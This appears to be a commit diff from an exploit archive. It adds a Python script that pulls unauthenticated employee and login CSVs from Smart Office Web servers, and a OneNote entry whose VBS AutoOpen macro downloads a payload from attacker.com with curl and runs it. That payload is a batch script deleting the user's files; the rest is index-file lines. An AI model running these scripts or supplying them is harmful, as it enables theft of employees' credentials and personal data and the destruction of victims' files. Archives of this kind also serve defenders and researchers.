DB: 2023-06-23

3 changes to exploits/shellcodes/ghdb Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated) Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution Super Socializer 7.13.52 - Reflected XSS
2023-06-23 00:16:26 +00:00 · 2023-06-23 00:16:26 +00:00 · ea194c414f
commit ea194c414f
parent 00f6b3e7ed
3 changed files with 112 additions and 2 deletions
--- a/exploits/aspx/webapps/51539.py
+++ b/exploits/aspx/webapps/51539.py
@ -0,0 +1,63 @@
+# Exploit Title: Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)
+# Shodan Dork:: inurl:"https://www.shodan.io/search?query=smart+office"
+# Date: 09/Dec/2022
+# Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/)
+# Vendor Homepage: https://smartofficepayroll.com/
+# Software Link: https://smartofficepayroll.com/downloads
+# Version: Smart Office Web 20.28 and before
+# CVE Number : CVE-2022-47075 and CVE-2022-47076
+# CVSS : 7.5 (High)
+# Reference : https://cvewalkthrough.com/smart-office-suite-cve-2022-47076-cve-2022-47075/
+# Vulnerability Description:
+# Smart Office Web 20.28  and before allows Remote Information Disclosure(Unauthenticated) via insecure direct object reference (IDOR). This was fixed in latter version except for ExportEmployeeDetails.
+
+import wget
+import os
+from colorama import Fore, Style
+
+def download_file(url, filename):
+    wget.download(url, filename)
+
+# Disclaimer
+print(Fore.YELLOW + "Disclaimer: This script is for educational purposes only.")
+print("The author takes no responsibility for any unauthorized usage.")
+print("Please use this script responsibly and adhere to the legal and ethical guidelines.")
+
+agree = input("Do you agree to the disclaimer? (1 = Yes, 0 = No): ")
+if agree != "1":
+    print("You have chosen not to agree. Exiting the script.")
+    exit()
+
+# Print name in red
+name = "Exploit by Tejas Nitin Pingulkar"
+print(Fore.RED + name)
+print(Style.RESET_ALL)  # Reset color
+
+website = input("Enter URL [https://1.1.1.1:1111 or http://1.1.1.1]: ")
+target_version = input("Is the target software version 20.28 or later? (1 = Yes, 0 = No): ")
+folder_name = input("Enter the folder name to save the files: ")
+
+# Create the folder if it doesn't exist
+if not os.path.exists(folder_name):
+    os.makedirs(folder_name)
+
+urls_filenames = []
+
+if target_version == "1":
+    urls_filenames.append((website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails", "ExportEmployeeOtherDetails.csv"))
+else:
+    urls_filenames.extend([
+        (website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails", "ExportEmployeeDetails.csv"),
+        (website + "/DisplayParallelLogData.aspx", "DisplayParallelLogData.txt"),
+        (website + "/ExportReportingManager.aspx", "ExportReportingManager.csv"),
+        (website + "/ExportEmployeeLoginDetails.aspx", "ExportEmployeeLoginDetails.csv")
+    ])
+
+print("CVE-2022-47076: Obtain user ID and password from downloaded source")
+
+for url, filename in urls_filenames:
+    download_file(url, os.path.join(folder_name, filename))
+
+# Print "for more such interesting exploits, visit cvewalkthrough.com" in red
+print(Fore.RED + "\nFor more such interesting exploits, visit cvewalkthrough.com")
+print(Style.RESET_ALL)  # Reset color
--- a/exploits/multiple/remote/51538.txt
+++ b/exploits/multiple/remote/51538.txt
@ -0,0 +1,45 @@
+## Title: Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing
+## Author: nu11secur1ty
+## Date: 06.22.2023
+## Vendor: https://www.microsoft.com/
+## Software: https://www.microsoft.com/en/microsoft-365/onenote/digital-note-taking-app
+## Reference: https://portswigger.net/kb/issues/00400c00_input-returned-in-response-reflected
+
+## Description:
+Microsoft OneNote is vulnerable to spoofing attacks. The malicious
+user can trick the victim into clicking on a very maliciously crafted
+URL or download some other malicious file and execute it. When this
+happens the game will be over for the victim and his computer will be
+compromised.
+Exploiting the vulnerability requires that a user open a specially
+crafted file with an affected version of Microsoft OneNote and then
+click on a specially crafted URL to be compromised by the attacker.
+
+STATUS: HIGH Vulnerability
+
+[+]Exploit:
+```vbs
+Sub AutoOpen()
+  Call Shell("cmd.exe /S /c" & "curl -s
+https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass",
+vbNormalFocus)
+End Sub
+
+```
+[+]Inside-exploit
+```
+@echo off
+del /s /q C:%HOMEPATH%\IMPORTANT\*
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-33140)
+
+## Proof and Exploit:
+[href](https://www.nu11secur1ty.com/2023/06/cve-2023-33140.html)
+
+## Time spend:
+01:15:00
+
+
+--
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -1847,6 +1847,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41618,exploits/aspx/webapps/41618.txt,"Sitecore CMS 8.1 Update-3 - Cross-Site Scripting",2017-03-15,"Pralhad Chaskar",webapps,aspx,,2017-03-15,2017-03-15,0,CVE-2016-8855,,,,,
 45973,exploits/aspx/webapps/45973.txt,"Sitecore CMS 8.2 - Cross-Site Scripting / Arbitrary File Disclosure",2017-05-05,"Usman Saeed",webapps,aspx,,2018-12-11,2018-12-11,0,,,,,,
 45152,exploits/aspx/webapps/45152.txt,"Sitecore.Net 8.1 - Directory Traversal",2018-08-06,Chris,webapps,aspx,,2018-08-06,2018-08-09,0,CVE-2018-7669,,,,,
+51539,exploits/aspx/webapps/51539.py,"Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)",2023-06-22,"Tejas Pingulkar",webapps,aspx,,2023-06-22,2023-06-22,0,CVE-2022-47076;CVE-2022-47075,,,,,
 42923,exploits/aspx/webapps/42923.txt,"SmarterStats 11.3.6347 - Cross-Site Scripting",2017-09-27,sqlhacker,webapps,aspx,,2017-10-01,2017-10-01,0,CVE-2017-14620,,,,,
 50328,exploits/aspx/webapps/50328.txt,"SmarterTools SmarterTrack 7922 - 'Multiple' Information Disclosure",2021-09-24,"Andrei Manole",webapps,aspx,,2021-09-24,2021-09-24,0,,,,,,
 47793,exploits/aspx/webapps/47793.txt,"Telerik UI - Remote Code Execution via Insecure Deserialization",2019-12-18,"Bishop Fox",webapps,aspx,,2019-12-18,2019-12-18,0,CVE-2019-18935,Deserialization,,,,https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui
@ -11024,6 +11025,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 19686,exploits/multiple/remote/19686.txt,"Microsoft Internet Explorer 4/5/5.5/5.0.1 - external.NavigateAndFind() Cross-Frame",1999-12-22,"Georgi Guninski",remote,multiple,,1999-12-22,2012-07-08,1,CVE-2000-0028;OSVDB-7903,,,,,https://www.securityfocus.com/bid/887/info
 19492,exploits/multiple/remote/19492.txt,"Microsoft Internet Explorer 5 / Netscape Communicator 4.0/4.5/4.6 - JavaScript STYLE",1999-09-13,"Georgi Guninski",remote,multiple,,1999-09-13,2012-06-30,1,CVE-1999-0750,,,,,https://www.securityfocus.com/bid/630/info
 24189,exploits/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1 / Opera 7.51 - URI Obfuscation",2004-06-10,http-equiv,remote,multiple,,2004-06-10,2013-01-17,1,,,,,,https://www.securityfocus.com/bid/10517/info
+51538,exploits/multiple/remote/51538.txt,"Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing",2023-06-22,nu11secur1ty,remote,multiple,,2023-06-22,2023-06-22,0,,,,,,
 19451,exploits/multiple/remote/19451.txt,"Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP",1999-08-11,L0pth,remote,multiple,,1999-08-11,2012-06-28,1,CVE-1999-0875;OSVDB-1039,,,,,https://www.securityfocus.com/bid/578/info
 51376,exploits/multiple/remote/51376.txt,"Microsoft Word 16.72.23040900 - Remote Code Execution (RCE)",2023-04-20,nu11secur1ty,remote,multiple,,2023-04-20,2023-04-20,0,CVE-2023-28311,,,,,
 20425,exploits/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 - Insecure Registration",2000-11-22,"Joey Maier",remote,multiple,,2000-11-22,2012-08-11,1,CVE-2000-1173;OSVDB-11344,,,,,https://www.securityfocus.com/bid/1977/info
@ -23438,7 +23440,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34788,exploits/php/webapps/34788.txt,"MODx manager - '/controllers/default/resource/tvs.php?class_key' Traversal Local File Inclusion",2010-09-29,"John Leitch",webapps,php,,2010-09-29,2014-09-26,1,CVE-2010-5278;OSVDB-68265,,,,,https://www.securityfocus.com/bid/43577/info
 45055,exploits/php/webapps/45055.py,"Modx Revolution < 2.6.4 - Remote Code Execution",2018-07-18,"Vitalii Rudnykh",webapps,php,,2018-07-18,2018-07-18,0,,,,,,
 15701,exploits/php/webapps/15701.txt,"MODx REvolution CMS 2.0.4-pl2 - POST injection Cross-Site Scripting",2010-12-06,LiquidWorm,webapps,php,,2010-12-06,2010-12-06,0,OSVDB-69643,,,,,http://bugs.modx.com/issues/2918
-51059,exploits/php/webapps/51059.txt,"MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-26149,,,,,
+51059,exploits/php/webapps/51059.txt,"MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-06-22,1,CVE-2022-26149,,,,,
 4739,exploits/php/webapps/4739.pl,"MOG-WebShop - 'index.php?group' SQL Injection",2007-12-18,k1tk4t,webapps,php,,2007-12-17,,1,OSVDB-40272;CVE-2007-6466,,,,,
 25304,exploits/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,webapps,php,,2013-05-08,2013-06-24,1,OSVDB-93234;CVE-2012-6495;OSVDB-88825;CVE-2012-6081,,,,http://www.exploit-db.commoin-1.9.5.tar.gz,
 29915,exploits/php/webapps/29915.txt,"MoinMoin 1.5.x - 'index.php' Cross-Site Scripting",2007-04-26,"En Douli",webapps,php,,2007-04-26,2013-11-30,1,CVE-2007-2423;OSVDB-36567,,,,,https://www.securityfocus.com/bid/23676/info
@ -30180,7 +30182,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9270,exploits/php/webapps/9270.txt,"Super Mod System 3.0 - 's' SQL Injection",2009-07-27,MizoZ,webapps,php,,2009-07-26,,1,OSVDB-56562;CVE-2009-3224,,,,,
 9180,exploits/php/webapps/9180.txt,"Super Simple Blog Script 2.5.4 - 'entry' SQL Injection",2009-07-17,JIKO,webapps,php,,2009-07-16,,1,OSVDB-55952;CVE-2009-2553,,,,,
 9179,exploits/php/webapps/9179.txt,"Super Simple Blog Script 2.5.4 - Local File Inclusion",2009-07-17,JIKO,webapps,php,,2009-07-16,,1,OSVDB-55953;CVE-2009-2552,,,,,
-51534,exploits/php/webapps/51534.py,"Super Socializer 7.13.52 - Reflected XSS",2023-06-20,"Amirhossein Bahramizadeh",webapps,php,,2023-06-20,2023-06-20,0,CVE-2023-2779,,,,,
+51534,exploits/php/webapps/51534.py,"Super Socializer 7.13.52 - Reflected XSS",2023-06-20,"Amirhossein Bahramizadeh",webapps,php,,2023-06-20,2023-06-22,1,CVE-2023-2779,,,,,
 8874,exploits/php/webapps/8874.txt,"SuperCali PHP Event Calendar - Arbitrary Change Admin Password",2009-06-04,TiGeR-Dz,webapps,php,,2009-06-03,,1,,,,,,
 4141,exploits/php/webapps/4141.txt,"SuperCali PHP Event Calendar 0.4.0 - SQL Injection",2007-07-03,t0pP8uZz,webapps,php,,2007-07-02,2016-10-05,1,OSVDB-36300;CVE-2007-3582,,,,http://www.exploit-db.comsupercali-0.4.0.zip,
 44639,exploits/php/webapps/44639.txt,"SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass",2018-05-17,L0RD,webapps,php,,2018-05-17,2018-06-15,0,,"Cross-Site Scripting (XSS)",,,,